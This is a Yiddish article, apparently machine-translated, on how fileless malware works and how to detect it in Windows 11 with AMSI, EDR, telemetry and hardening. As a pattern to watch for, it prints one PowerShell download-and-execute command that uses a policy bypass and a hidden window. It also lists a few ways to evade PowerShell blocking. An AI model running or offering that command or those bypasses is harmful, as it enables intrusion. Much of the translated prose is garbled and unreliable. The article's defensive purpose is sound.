ווי אזוי צו דעטעקטירן געפערלעכע טעקע-לאזע מאלווער אין ווינדאוס 11

¿ווי אזוי צו דעטעקטירן געפערלעכע טעקע-לאזע מאלווער? טעקעלאָזע אַטאַק טעטיקייט איז באַדייטנד געוואקסן, און צו מאַכן די זאַך ערגער, ווינדאָוס 11 איז נישט אימוּןדי צוגאַנג בייפּאַסט דעם דיסק און פֿאַרלאָזט זיך אויף זכּרון און לעגיטימע סיסטעם מכשירים; דעריבער האָבן אונטערשריפט-באַזירטע אַנטיווירוס פּראָגראַמען שוועריקייטן. אויב איר זוכט אַ פאַרלעסלעכן וועג צו דעטעקטירן עס, ליגט די ענטפֿער אין קאָמבינירן טעלעמעטריע, נאַטור אַנאַליז, און ווינדאָוז קאָנטראָלס.

אין דעם היינטיקן עקאָסיסטעם, קאַמפּיינס וואָס מיסברויכן PowerShell, WMI, אדער Mshta קאָעקזיסטירן מיט מער סאָפיסטיקירטע טעקניקס ווי זכּרון אינדזשעקשאַנז, פּערסיסטענס "אָן אָנרירן" דעם דיסק, און אפילו פירמווער מיסברוכןדער שליסל איז צו פֿאַרשטיין די סכּנה מאַפּע, די אַטאַק פאַזעס, און וואָס סיגנאַלן זיי לאָזן אפילו ווען אַלץ פּאַסירט אין ראַם.

וואָס איז טעקע-לאָזע מאַלוואַרע און פאַרוואָס איז עס אַ זאָרג אין ווינדאָוז 11?

ווען מיר רעדן וועגן "פֿייללאָזע" סכנות, מיינען מיר שלעכטע קאָד וואָס איר דאַרפֿט נישט אַוועקלייגן נײַע עקסעקוטאַבלעס אין דעם טעקע סיסטעם צו ארבעטן. עס ווערט געווענליך אינדזשעקטירט אין לויפנדיקע פראצעסן און אויסגעפירט אין ראם, זיך פארלאזנדיג אויף אינטערפרעטערס און ביינעריס וואס זענען אונטערגעשריבן דורך מייקראסאפט (למשל, פּאַוערשעל, WMI, rundll32, mshtaדאָס רעדוצירט אייער פוסשטאַפּ און ערלויבט אייך צו בייפּאַסן מאָטאָרן וואָס זוכן נאָר פֿאַר פֿאַרדעכטיקע טעקעס.

אפילו אפיס דאקומענטן אדער פידיעפס וואס נוצן אויס שוואכקייטן צו לאנצירן קאמאנדעס ווערן באטראכט אלס טייל פון דעם פענאמען, ווייל אַקטיווירן אויספירונג אין זכּרון אָן לאָזן נוצלעכע ביינעריס פֿאַר אַנאַליז. מיסברויך פֿון מאַקראָס און DDE אין אפיס, ווייל דער קאד לויפט אין לעגיטימע פראצעסן ווי WinWord.

אַטאַקערס קאָמבינירן סאציאלע אינזשעניריע (פישינג, ספּאַם לינקס) מיט טעכנישע טראַפּס: דער באַניצער'ס קליק הייבט אָן אַ קייט אין וועלכער אַ סקריפּט דאַונלאָודז און עקסעקוטירט די לעצטע פּיילאָוד אין זכּרון, אויסמיידן לאָזן אַ שפּור אויף דער דיסק. די צילן גייען פון דאטן גנייווע ביז ראַנסאָמווער אויספירונג, ביז שטילע זייטיקע באַוועגונג.

טיפאָלאָגיעס לויט פֿוסדרוק אין סיסטעם: פֿון 'ריין' ביז כייברידס

כדי צו פארמיידן פארמישטע קאנצעפטן, איז עס נוצלעך צו צעשיידן סכנות לויט זייער גראד פון אינטעראקציע מיטן פייל סיסטעם. די קאטעגאריזאציע פארקלערט וואָס בלייבט, וואו לעבט דער קאָד, און וואָסערע סימנים לאָזט ער איבער?.

טיפ I: קיין טעקע טעטיקייט

גאָר טעקע-פֿרײַע מאַלוואַרע שרײַבט גאָרנישט אויף דיסק. אַ קלאַסישער בײַשפּיל איז אויסנוצן אַ נעץ וואַלנעראַביליטי (ווי דער EternalBlue וועקטאָר אַמאָל) צו אימפּלעמענטירן אַ באַקדאָר וואָס געפינט זיך אין קערנעל זכּרון (פֿאַלן ווי DoublePulsar). דאָ, אַלץ פּאַסירט אין RAM און עס זענען נישטאָ קיין אַרטיפאַקץ אין דער טעקע סיסטעם.

אן אנדער אָפּציע איז צו קאַנטאַמינירן די פירמווער פון קאָמפּאָנענטן: בייאָוס/UEFI, נעץ אַדאַפּטערס, USB פּעריפעראַלס (BadUSB-טיפּ טעקניקס) אדער אפילו CPU סובסיסטעמען. זיי בלייבן דורך ריסטאַרטס און ריינסטאַלס, מיט דער צוגעלייגטער שוועריקייט אַז ווייניק פּראָדוקטן דורכקוקן פירמווערדאָס זענען קאָמפּליצירטע אַטאַקעס, ווייניקער אָפט, אָבער געפערלעך צוליב זייער שטילקייט און האַרטקייט.

טיפ II: אומדירעקטע ארכיווירונג טעטיקייט

דאָ, די מאַלווער "לאָזט נישט" זײַן אייגענעם עקסעקוטאַבאַל, נאָר ניצט סיסטעם-פאַרוואַלטעטע קאַנטיינערס וואָס זענען אין עיקר געהיט ווי טעקעס. למשל, באַקטירן וואָס פלאַנצן PowerShell באַפֿעלן אין די WMI רעפּאָזיטאָרי און אַקטיוויירן זיין אויספירונג מיט געשעעניש פילטערס. עס איז מעגלעך צו ינסטאַלירן עס פֿון די קאָמאַנד ליניע אָן אַראָפּנעמען ביינערי טעקעס, אָבער די WMI רעפּאָזיטאָרי געפֿינט זיך אויף דיסק ווי אַ לעגיטימע דאַטאַבייס, מאַכנדיג עס שווער צו רייניקן אָן צו אַפעקטירן די סיסטעם.

פֿון אַ פּראַקטישן שטאַנדפּונקט ווערן זיי באַטראַכט ווי אָן פֿײַלן, ווײַל יענער קאָנטעינער (WMI, רעגיסטרי, אאַז"וו) עס איז נישט קיין קלאַסישע דעטעקטירבארע עקסעקוטאַבלע און איר רייניקונג איז נישט קיין קלייניקייט. דער רעזולטאַט: שטילע אָנהאַלטונג מיט ווייניק "טראַדיציאָנעלע" שפּורן.

טיפ III: פארלאנגט טעקעס צו פונקציאנירן

עטלעכע פאַלן האַלטן אַ 'פֿייללאָז' פּערסיסטענץ אויף א לאגישן שטאפל, דארפן זיי א טעקע-באזירטן טריגער. דער טיפישער ביישפיל איז קאווטער: עס רעגיסטרירט א שאָל ווערב פאר א צופעליגע עקסטענשאן; ווען א טעקע מיט יענער עקסטענשאן ווערט געעפנט, ווערט א קליין סקריפט ניצנדיג mshta.exe געלאנצירט, וואס רעקאנסטרואירט די בייזוויליגע סטרינג פון די רעגיסטרי.

דער טריק איז אז די "בעיטער" טעקעס מיט צופעליגע עקסטענשאַנז אנטהאלטן נישט קיין אנאליזירבארע פּיילאָוד, און דער גרעסטער טייל פון דעם קאָד געפינט זיך אין דעם רעקאָרד (נאך א קאנטעינער). דעריבער ווערן זיי קאטעגאריזירט אלס אן קיין פיילן אין אימפאקט, אפילו כאטש שטרענג גערעדט זענען זיי אפהענגיק פון איין אדער מערערע דיסק ארטיפאקטן אלס א טריגער.

וועקטאָרן און 'באַלעבאָטים' פון אינפעקציע: וואו עס גייט אַרײַן און וואו עס באַהאַלט זיך

כדי צו פֿאַרבעסערן די דעטעקציע, איז עס וויכטיק צו קאַרטירן דעם פּונקט פֿון אַרײַנגאַנג און דעם באַלעבאָס פֿון דער אינפעקציע. די פּערספּעקטיוו העלפֿט צו פּלאַנירן ספּעציפֿישע קאָנטראָלן געבן פריאריטעט צו פאסיגע טעלעמעטריע.

עקספּלויטן

• טעקע-באזירט (טיפ III): דאקומענטן, עקסעקיוטעבלס, אלטע פלעש/דזשאווא טעקעס, אדער LNK טעקעס קענען אויסנוצן דעם בלעטערער אדער דעם מאטאר וואס פראצעסירט זיי צו לאודן שאָלקאד אין זכרון. דער ערשטער וועקטאָר איז א טעקע, אבער די פּיילאָוד גייט צו ראַם.
• נעץ-באזירט (טיפ I): א פעקל וואס נוצט אויס א שוואכקייט (למשל, אין SMB) דערגרייכט עקסעקוציע אין די באַניצערלאַנד אדער קערנעל. וואַנאַקריי האט פּאָפּולאַריזירט דעם צוגאַנג. דירעקטע זכּרון לאָוד אָן אַ נײַעם פֿײַל.

האַרדווער

• דעוויסעס (טיפ I): דיסק אדער נעץ קארטל פירמווער קען ווערן געענדערט און קאוד קען ווערן אריינגעפירט. שווער צו דורכקוקן און בלייבט אינדרויסן פון די אפערירן סיסטעם.
• CPU און פאַרוואַלטונג סובסיסטעמען (טיפ I): טעכנאָלאָגיעס ווי אינטעל'ס ME/AMT האָבן דעמאָנסטרירט וועגן צו נעטוואָרקינג און אויספירונג אַרויס פון די אָפּערירן סיסטעםעס אַטאַקירט אויף אַ זייער נידעריקן לעוועל, מיט אַ הויכן פּאָטענציעל פֿאַר געהיימניש.
• יו-עס-בי (טיפ I): BadUSB ערלויבט אייך צו איבערפּראָגראַמירן אַ USB דרייוו צו אימפּערסאָנאַזשירן אַ קלאַוויאַטור אָדער NIC און לאָנטשן קאַמאַנדז אָדער רידירעקט טראַפיק.
• בייאָס/UEFI (טיפּ I): בייזוויליקע פירמווער רעפּראָגראַמירן (פֿאַלן ווי מעבראָמי) וואָס לויפט איידער ווינדאָוס הייבט זיך אָן.
• היפּערווייזער (טיפ I): אימפלעמענטירן א מיני-היפּערווייזער אונטערן אפערירן סיסטעם צו באהאלטן זיין אנוועזנהייט. זעלטן, אבער שוין באמערקט אין דער פארעם פון היפּערווייזער רוטקיטס.

אויספירונג און אינדזשעקציע

• טעקע-באזירט (טיפּ III): EXE/DLL/LNK אדער סקעדזשולירטע אויפגאַבן וואָס לאָנטשן אינדזשעקשאַנז אין לעגיטימע פּראָצעסן.
• מאַקראָס (טיפּ III): VBA אין אפיס קען דעקאָדירן און אויספירן פּיילאָודז, אַרייַנגערעכנט פולע ראַנסאָמווער, מיטן באַניצער'ס צושטימונג דורך אָפּנאַר.
• סקריפּטן (טיפ II): PowerShell, VBScript אדער JScript פון טעקע, קאמאנד ליניע, סערוויסעס, רעגיסטראַציע אָדער WMIדער אַטאַקירער קען טייפּן דעם סקריפּט אין אַ ווייטער סעסיע אָן אָנרירן דעם דיסק.
• שטיוול רעקארד (MBR/Boot) (טיפ II): פאמיליעס ווי פעטיא איבערשרייבן דעם בוט סעקטאר צו נעמען קאנטראל ביים סטארטאפ. עס איז אינדרויסן פון די פייל סיסטעם, אבער צוטריטלעך פאר די אפערירן סיסטעם און מאדערנע לייזונגען וואס קענען עס צוריקשטעלן.

ווי טעקעלאָזע אַטאַקעס אַרבעטן: פאַזעס און סיגנאַלן

כאָטש זיי לאָזן נישט קיין עקסעקיוטאַבל טעקעס, פֿאָלגן די קאַמפּיינס אַ פֿאַזירטע לאָגיק. פֿאַרשטיין זיי דערמעגלעכט מאָניטאָרינג. געשעענישן און באַציִונגען צווישן פּראָצעסן וואָס לאָזן טאַקע אַן אָפּדרוק.

• ערשטע צוטריטפישינג אטאקעס ניצן לינקס אדער אטעטשמענטס, קאמפראמיטירטע וועבזייטלעך, אדער גע'גנב'עטע קרעדענשעלס. פילע קייטן הייבן זיך אן מיט אן אפיס דאקומענט וואס טריגערט א באפעל. פּאַוערשעל.
• פּערסיסטאַנסבאַקטירן דורך WMI (פילטערס און אַבאָנעמענטן), רעגיסטרי אויספירונג שליסלען אדער געפלאנטע אויפגאבעס וואס רילאָנטשן סקריפּטן אָן אַ נייע בייזע טעקע.
• עקספילטראַציעאזוי שנעל ווי די אינפארמאציע איז געזאמלט, ווערט עס ארויסגעשיקט פון נעץ ניצנדיק פארטרויענסווערדיגע פראצעסן (בראַוזער, פּאַוערשעל, ביטסאַדמין) צו מישן טראַפיק.

דאָס מוסטער איז ספּעציעל פֿאַרדעכטיק ווײַל די אטאקע אינדיקאטארן זיי באַהאַלטן זיך אין נאָרמאַליטעט: קאָמאַנד-ליניע אַרגומענטן, פּראָצעס קייטן, אַנאַמאַלע אַוטבאַונד קאַנעקשאַנז, אָדער אַקסעס צו ינדזשעקשאַן APIs.

געוויינטלעכע טעכניקן: פון זכּרון ביז רעקאָרדינג

די אַקטיאָרן פֿאַרלאָזן זיך אויף אַ ריי פֿון מעטאָדן וואָס אָפּטימיזירן שטילקייט. עס איז נוצלעך צו וויסן די מערסט געוויינטלעכע צו אַקטיווירן עפעקטיווע דעטעקציע.

• איינוואוינער אין זכרוןלאָדן פּיילאָודז אין דעם פּלאַץ פון אַ טראַסטיד פּראָצעס וואָס וואַרט אויף אַקטיוואַציע. רוטקיטס און הוקס אין קערנעל, הייבן זיי דעם לעוועל פון פארדעקן.
• פּערסיסטענס אין די רעגיסטריראַטעוועט פֿאַרשליסענע בלאָבס אין שליסלען און רעכידראַטירט זיי פֿון אַ לעגיטימען לאָנטשער (mshta, rundll32, wscript). דער עפֿעמעראַלער אינסטאַללער קען זיך זעלבסט-דעסטרוקטירן צו מינימיזירן זײַן פֿוסדרוק.
• קרעדענשאַל פישינגניצנדיק גע'גנב'עטע באַניצער נעמען און פּאַסווערטער, עקסעקוטירט דער אַטאַקירער ווייטע שעלז און פלאַנצן שטילער צוטריט אין רעגיסטרי אדער WMI.
• 'פֿייללאָז' ראַנסאָמווערענקריפּשאַן און C2 קאָמוניקאַציע ווערן אָרקעסטרירט פֿון ראַם, וואָס רעדוצירט די מעגלעכקייטן פֿאַר דעטעקשאַן ביז דער שאָדן איז קענטיק.
• אַפּערייטינג קיץאויטאמאטישע קייטן וואס דעטעקטירן שוואכקייטן און דיפּלויען בלויז-זכּרון פּיילאָודז נאָכדעם וואָס דער באַניצער קליקט.
• דאָקומענטן מיט קאָדמאַקראָס און מעכאַניזמען ווי DDE וואָס אַקטיוויירן קאָמאַנדעס אָן שפּאָרן עקסעקוטאַבאַלז אויף דיסק.

אינדוסטריע שטודיעס האבן שוין געוויזן באמערקבארע שפיצן: אין איין פעריאד פון 2018, א אַ פאַרגרעסערונג פון איבער 90% אין סקריפּט-באזירטע און פּאַוערשעל קייט אטאקעס, א סימן אז דער וועקטאָר איז בילכער צוליב זיין עפעקטיווקייט.

די אַרויסרופן פֿאַר קאָמפּאַניעס און סאַפּלייערז: פארוואס בלאָקירן איז נישט גענוג

עס וואָלט זיין פארפירעריש צו דיאַקטיווירן PowerShell אָדער פארבאטן מאַקראָס אויף אייביק, אָבער דו וואָלסט צעברעכן די אָפּעראַציעפּאַוערשעל איז אַ זייל פון מאָדערנער אַדמיניסטראַציע און אָפיס איז וויכטיק אין געשעפט; בלינדערהייט בלאָקירן איז אָפט נישט מעגלעך.

דערצו, עס זענען דא וועגן צו בייפּאַסן גרונטלעכע קאָנטראָלן: לויפן PowerShell דורך DLLs און rundll32, פּאַקאַדזשינג סקריפּטן אין EXEs, ברענגט אייער אייגענע קאפיע פון ​​PowerShell אדער אפילו באַהאַלטן סקריפּטן אין בילדער און זיי אַרויסנעמען אין זכּרון. דעריבער, קען די פאַרטיידיקונג נישט באַזירט ווערן בלויז אויף לייקענען די עקזיסטענץ פון מכשירים.

נאך א געוויינטלעכע טעות איז דעלעגירן די גאנצע באשלוס צו די וואָלקן: אויב דער אַגענט דאַרף וואַרטן אויף אַן ענטפער פון די סערווער, איר פארלירט רעאַל-צייט פאַרהיטונגטעלעמעטריע דאַטן קענען זיין אַרויפגעלאָדן צו באַרייַכערן די אינפֿאָרמאַציע, אָבער די מיטיגאַציע מוז פּאַסירן בײַם ענדפּונקט.

ווי אזוי צו דעטעקטירן טעקע-לאזע מאלווער אין ווינדאָוס 11: טעלעמעטריע און אויפפירונג

די געווינס סטראַטעגיע איז מאָניטאָרירן פּראָצעסן און זכּרוןנישט טעקעס. בייזוויליגע אויפפירונגען זענען מער סטאביל ווי די פארמען וואס א טעקע נעמט, מאכנדיג זיי אידעאל פאר פאַרהיטונג מאטארן.

• AMSI (אַנטימאַלווער סקען צובינד)עס כאפט PowerShell, VBScript, אדער JScript סקריפטן אפילו ווען זיי זענען דינאמיש קאנסטרואירט אין זכרון. אויסגעצייכנט פארן כאפן פארדעקטע סטרינגס פארן אויספירן.
• פּראָצעס מאָניטאָרינגאָנהייב/ענדיקונג, PID, עלטערן און קינדער, רוטעס, באַפֿעלן שורות און העשיז, פּלוס עקסעקוטיאָן ביימער צו פֿאַרשטיין די גאַנצע געשיכטע.
• זכּרון אַנאַליז: דעטעקציע פון ​​אינדזשעקשאַנז, רעפלעקטיוו אָדער PE לאָודז אָן אָנרירן דעם דיסק, און איבערבליק פון ומגעוויינטלעכע עקסעקוטאַבאַל געביטן.
• שוץ פון סטאַרטער סעקטאָרקאָנטראָל און רעסטאָראַציע פון ​​די MBR/EFI אין פאַל פון טאַמפּערינג.

אין דער מייקראָסאָפֿט עקאָסיסטעם, קאָמבינירט Defender for Endpoint AMSI, נאַטור מאָניטאָרינגזכּרון סקאַנינג און וואָלקן-באַזירט מאַשין לערנען ווערן גענוצט צו סקיילן דעטעקציעס קעגן נייַע אָדער פארשוואַרצטע וואַריאַנטן. אַנדערע פאַרקויפער נוצן ענלעכע צוגאַנגען מיט קערנעל-רעזידענט ענדזשינס.

רעאליסטיש ביישפּיל פון קאָרעלאַציע: פֿון דאָקומענט צו PowerShell

שטעלט זיך פאר א קייט וואו אויטלוק דאונלאודט אן אטעטשמענט, ווארד עפנט דעם דאקומענט, אקטיווער אינהאלט ווערט אקטיוויזירט, און פאוערשעל ווערט געלאנצירט מיט פארדעכטיגע פאראמעטערס. געהעריגע טעלעמעטריע וואלט געוויזן די באַפֿעל ליניע (למשל, ExecutionPolicy Bypass, באַהאַלטענע פֿענצטער), פֿאַרבינדן זיך צו אַן נישט-פֿאַרטרויטע דאָמעין און שאַפֿן אַ קינד פּראָצעס וואָס אינסטאַלירט זיך אין AppData.

אַן אַגענט מיט לאָקאַלן קאָנטעקסט איז טויגיק צו האַלטן און צוריקדרייען בייזוויליקע טעטיקייט אָן מאַנועלע אריינמישונג, אין אַדישאַן צו מעלדן די SIEM אָדער דורך בליצפּאָסט / SMS. עטלעכע פּראָדוקטן לייגן צו אַ וואָרצל גרונט אַטריביוטיישאַן שיכט (StoryLine-טיפּ מאָדעלס), וואָס ווייזט נישט צו די קענטיק פּראָצעס (Outlook / Word), אָבער צו די פולער בייזוויליקער פאָדעם און זײַן אָנהייב צו קאָמפּרעהענסיוו רייניקן די סיסטעם.

א טיפישער באַפֿעל מוסטער צו היטן אויס פֿאַר קען אויסזען ווי דאָס: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');לאָגיק איז נישט די גענויע שטריקל, אָבער דער סכום פון סיגנאַלןפאליסי בייפּאַס, באַהאַלטענע פֿענצטער, קלאָר דאַונלאָוד, און אין-זכּרון אויספירונג.

AMSI, פּייפּליין און ראָלע פֿון יעדן אַקטיאָר: פֿון דעם ענדפּוינט ביזן SOC

ווייטער פון סקריפּט קאַפּטשער, אָרקעסטרירט אַ שטאַרקע אַרכיטעקטור טריט וואָס פאַסילאַטירן אויספאָרשונג און ענטפער. וואָס מער באַווײַזן איידער מען נעמט אויס די לאַסט, אַלץ בעסער., בעסער.

• סקריפּט אינטערסעפּשאַןAMSI צושטעלט דעם אינהאַלט (אפילו אויב עס ווערט גענערירט אויפן וועג) פֿאַר סטאַטישע און דינאַמישע אַנאַליז אין אַ מאַלוואַרע פּייפּליין.
• פּראָצעס געשעענישןPIDs, ביינעריז, העשיז, רוטס, און אנדערע דאַטן ווערן געזאַמלט. אַרגומענטן, אויפשטעלן די פּראָצעס ביימער וואָס האָבן געפֿירט צום לעצטן לאָד.
• דעטעקציע און באריכטןדי דעטעקציעס ווערן געוויזן אויף דער פּראָדוקט קאַנסאָול און ווייטערגעשיקט צו נעץ פּלאַטפאָרמעס (NDR) פֿאַר קאַמפּיין וויזואַליזאַציע.
• באַניצער גאַראַנטיזאפילו אויב אַ סקריפּט ווערט אינדזשעקטעד אין זכּרון, די פריימווערק AMSI אינטערסעפּטירט עס אין קאָמפּאַטיבלע ווערסיעס פון ווינדאָוז.
• אַדמיניסטראַטאָר מעגלעכקייטןפּאָליטיק קאָנפיגוראַציע צו געבן מעגלעכקייט צו דורכקוקן סקריפּטן, נאַטור-באַזירט בלאָקירן און שאַפֿן באַריכטן פֿון דער קאַנסאָול.
• SOC אַרבעטעקסטראקציע פון ​​ארטיפאקטן (VM UUID, OS ווערסיע, סקריפּט טיפ, איניציאטאר פראצעס און זיין עלטערן, העשעס און קאמאנד ליניעס) צו ריקריייטן די היסטאריע און ליפט רעגולאציעס צוקונפֿט.

ווען די פּלאַטפאָרמע ערלויבט עקספּאָרטירן די זכּרון באַפער פֿאַרבונדן מיט דער אויספֿירונג, קענען פֿאָרשער שאַפֿן נײַע דעטעקציעס און פֿאַררייכערן די פֿאַרטיידיקונג קעגן ענלעכע וואַריאַנטן.

פּראַקטישע מיטלען אין ווינדאָוז 11: פאַרהיטונג און גייעג

אין צוגאב צו האבן EDR מיט זכרון אינספעקציע און AMSI, לאָזט Windows 11 אייך פֿאַרמאַכן אַטאַק ספּייסעס און פֿאַרבעסערן זעבארקייט מיט אייגענע קאָנטראָלן.

• רעגיסטראַציע און באַגרענעצונגען אין PowerShellערמעגליכט סקריפּט בלאָק לאָגינג און מאָדול לאָגינג, אַפּליקירט באַגרענעצטע מאָדעס וואו מעגלעך, און קאָנטראָלירט די נוצן פון בייפּאַס/פאַרבאָרגן.
• אטאקע אויבערפלאַך רעדוקציע (ASR) כּלליםבלאָקירט סקריפּט לאָנטשיז דורך אָפיס פּראָצעסן און WMI זידלען/PSExec ווען נישט נויטיג.
• אפיס מאַקראָ פּאָליטיקס: דיאַקטיווירט דורך דיפאָלט, אינערלעכע מאַקראָ אונטערשרייבונג און שטרענגע צוטרוי ליסטעס; מאָניטאָרירט לעגאַסי DDE פלאָוז.
• WMI אויডিץ און רעגיסטרימאָניטאָרירט געשעעניש אַבאָנעמענטן און אויטאָמאַטישע אויספֿירונג שליסלען (Run, RunOnce, Winlogon), ווי אויך אויפֿגאַבע שאַפונג סקעדזשולד.
• סטאַרטאַפּ שוץאַקטיוויזירט זיכערער בוט, קאָנטראָלירט די אָרנטלעכקייט פון MBR/EFI און וואַלידירט אַז עס זענען נישטאָ קיין מאָדיפֿיקאַציעס בײַם סטאַרטאַפּ.
• פּאַטשן און פֿאַרהאַרטןפֿאַרמאַכט אויסניצבאַרע שוואַכקייטן אין בראַוזערז, אָפֿיס קאָמפּאָנענטן און נעץ סערוויסעס.
• וויסיקייַטטרענירט באַניצער און טעכנישע טימז אין פישינג און סיגנאַלן פון געהיימע עקזעקוציעס.

פֿאַר זוכן, פֿאָקוסירט אויף פֿראַגעס וועגן: שאַפֿן פּראָצעסן דורך אָפֿפֿיס צו PowerShell/MSHTA, אַרגומענטן מיט דאַונלאָודסטרינג/דאַונלאָודפֿיילסקריפּטן מיט קלאָרע פארשוואַרצונג, רעפלעקטיווע אינדזשעקשאַנז, און אַוטבאַונד נעטוואָרקס צו פארדעכטיקע TLDs. קראָס-רעפערענס די סיגנאַלן מיט רעפּוטאַציע און אָפטקייט צו רעדוצירן ראַש.

וואָס קען יעדער מאָטאָר היינט דעטעקטירן?

מייקראָסאָפֿט'ס ענטערפּרייז סאַלושאַנז קאָמבינירן AMSI, ביכייוויעראַל אַנאַליטיקס, אויספאָרשן זכּרון און שטיוול סעקטאָר שוץ, פּלוס וואָלקן-באַזירטע ML מאָדעלן צו סקיילן קעגן אויפֿקומענדיקע טרעץ. אַנדערע פאַרקויפֿער ימפּלאַמענטירן קערנעל-לעוועל מאָניטאָרינג צו אונטערשיידן בייזוויליקע פון ​​גוטהאַרציקע ווייכווארג מיט אויטאָמאַטישע צוריקקער פון ענדערונגען.

א צוגאַנג באַזירט אויף עקזעקוציע געשיכטעס עס ערלויבט אייך צו אידענטיפיצירן די וואָרצל אורזאַך (למשל, אַן אַוטלוק אַטאַטשמענט וואָס טריגערט אַ קייט) און פֿאַרמינדערן דעם גאַנצן בוים: סקריפּטן, שליסלען, טאַסקס און צווישן-ביינעריז, און פֿאַרמייַדן צו בלייבן שטעקן אויף די קענטיקע סימפּטאָם.

געוויינטלעכע טעותים און ווי זיי צו פארמיידן

בלאקירן PowerShell אָן אַן אַלטערנאַטיוון פאַרוואַלטונג פּלאַן איז נישט בלויז נישט פּראַקטיש, אָבער עס זענען אויך וועגן צו רופן עס אומדירעקטדאס זעלבע גילט פאר מאקראס: אדער פירט מען זיי מיט פאליסיס און חתימות, אדער וועט דער ביזנעס ליידן. ס'איז בעסער צו פאקוסירן אויף טעלעמעטריע און אויפפירונגס-רעגולאציעס.

נאך א געוויינטלעכע טעות איז צו גלייבן אז ווייסליסטינג אפליקאציעס לייזט אלעס: פייללאזע טעכנאלאגיע פארלאזט זיך פונקט אויף דעם. טראַסטיד אַפּפּסדי קאָנטראָל זאָל באַאָבאַכטן וואָס זיי טוען און ווי זיי באַציִען זיך, נישט נאָר צי זיי זענען ערלויבט.

מיט אלעם אויבנדערמאנטן, הערט נישט-פייל-מאלעוואר אויף צו זיין א "גייסט" ווען מען מאניטארירט וואס איז טאקע וויכטיג: נאַטור, זכּרון און אָפּשטאַם פון יעדער אויספירונג. קאמבינירן AMSI, רייכע פראצעס טעלעמעטריע, אייגענע ווינדאוס 11 קאנטראלן, און אן EDR שיכט מיט אויפפירונג אנאליז גיט אייך דעם אויבערהאנט. לייגט צו צו דער גלייכונג רעאליסטישע פאליסיס פאר מאקראס און פאוערשעל, WMI/רעגיסטרי אוידיטינג, און יאגד וואס גיט פריאריטעט צו קאמאנד ליניעס און פראצעס ביימער, און איר האט א פארטיידיקונג וואס שניידט די קייטן איידער זיי מאכן א קלאנג.